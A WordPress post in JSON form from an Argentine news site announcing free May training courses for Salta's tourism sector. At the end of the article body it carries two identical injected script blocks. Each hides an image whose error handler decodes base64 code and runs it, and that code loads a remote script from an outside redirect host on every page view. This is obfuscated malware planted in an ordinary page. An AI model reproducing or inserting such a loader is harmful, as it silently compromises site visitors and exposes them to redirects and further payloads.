{"id":5170,"date":"2025-05-21T09:33:10","date_gmt":"2025-05-21T12:33:10","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5170"},"modified":"2025-08-13T23:33:02","modified_gmt":"2025-08-14T02:33:02","slug":"turismo-te-capacita-propuestas-formativas-gratuitas-en-mayo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5170","title":{"rendered":"Turismo te Capacita: propuestas formativas gratuitas en Mayo"},"content":{"rendered":"\n<p><strong><em>En el marco del trabajo conjunto que el Ministerio de Turismo y Deportes viene desarrollando junto al sector p\u00fablico y privado, durante el mes de mayo se ofrecer\u00e1n cursos gratuitos de capacitaci\u00f3n destinados a prestadores del sector tur\u00edstico de Salta.<\/em><\/strong><\/p>\n\n\n\n<p>El Ministerio de Turismo y Deportes en forma conjunta la C\u00e1mara Hotelera y Gastron\u00f3mica de Salta, la Asociaci\u00f3n de Hoteles de Turismo (AHT), el Bureau de Convenciones de Salta, la Secretar\u00eda de Miner\u00eda y Energ\u00eda de Salta, y EDESA., durante el mes de mayo, dictar\u00e1n cursos gratuitos de capacitaci\u00f3n destinados a prestadores del sector tur\u00edstico de Salta.<\/p>\n\n\n\n<p>Esta iniciativa tiene como objetivo brindar herramientas y conocimientos actualizados a los actores del sector, contribuyendo a mejorar la calidad de los servicios y la competitividad del destino Salta.<\/p>\n\n\n\n<p>Durante mayo se dictar\u00e1n las siguientes capacitaciones, en modalidades presenciales y virtuales:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>21 y 28 de mayo \u2013 Organizaci\u00f3n de Eventos y Congresos (presencial, Cafayate)<\/li>\n\n\n\n<li>21 de mayo \u2013 Energ\u00edas Renovables aplicadas al Turismo (modalidad virtual)<\/li>\n\n\n\n<li>22 de mayo \u2013 Neurociencia: Gesti\u00f3n de las Emociones (presencial, Chicoana)<\/li>\n\n\n\n<li>26 de mayo \u2013 Pensamiento Creativo: \u201cDesat\u00e1 tu Imaginaci\u00f3n\u201d (modalidad virtual)<\/li>\n\n\n\n<li>28 de mayo \u2013 Big Data para tu Empresa (modalidad virtual)<\/li>\n\n\n\n<li>29 y 30 de mayo \u2013 Primeros Auxilios (presencial, Iruya)<\/li>\n<\/ul>\n\n\n\n<p>A trav\u00e9s de la Direcci\u00f3n de Formaci\u00f3n y Calidad Tur\u00edstica se pondr\u00e1 a disposici\u00f3n del sector tur\u00edstico, estas propuestas de capacitaci\u00f3n, dise\u00f1adas para el desarrollo profesional, el crecimiento y la sostenibilidad del turismo. A trav\u00e9s de la Direcci\u00f3n de Formaci\u00f3n y Calidad Tur\u00edstica, el Ministerio pone a disposici\u00f3n del sector estas propuestas de capacitaci\u00f3n, dise\u00f1adas para fomentar el desarrollo profesional, el crecimiento del sector y la sostenibilidad del turismo en la provincia.<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n e inscripciones ingresar a&nbsp;<a href=\"http:\/\/www.turismotecapacita.com\/\">http:\/\/www.turismotecapacita.com<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco del trabajo conjunto que el Ministerio de Turismo y Deportes viene desarrollando junto al sector p\u00fablico y privado, durante el mes de mayo se ofrecer\u00e1n cursos gratuitos de capacitaci\u00f3n destinados a prestadores del sector tur\u00edstico de Salta. El Ministerio de Turismo y Deportes en forma conjunta la C\u00e1mara Hotelera y Gastron\u00f3mica de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5171,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11],"tags":[],"class_list":{"0":"post-5170","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5170"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5170"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5170\/revisions"}],"predecessor-version":[{"id":6488,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5170\/revisions\/6488"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5171"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5170"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5170"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5170"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}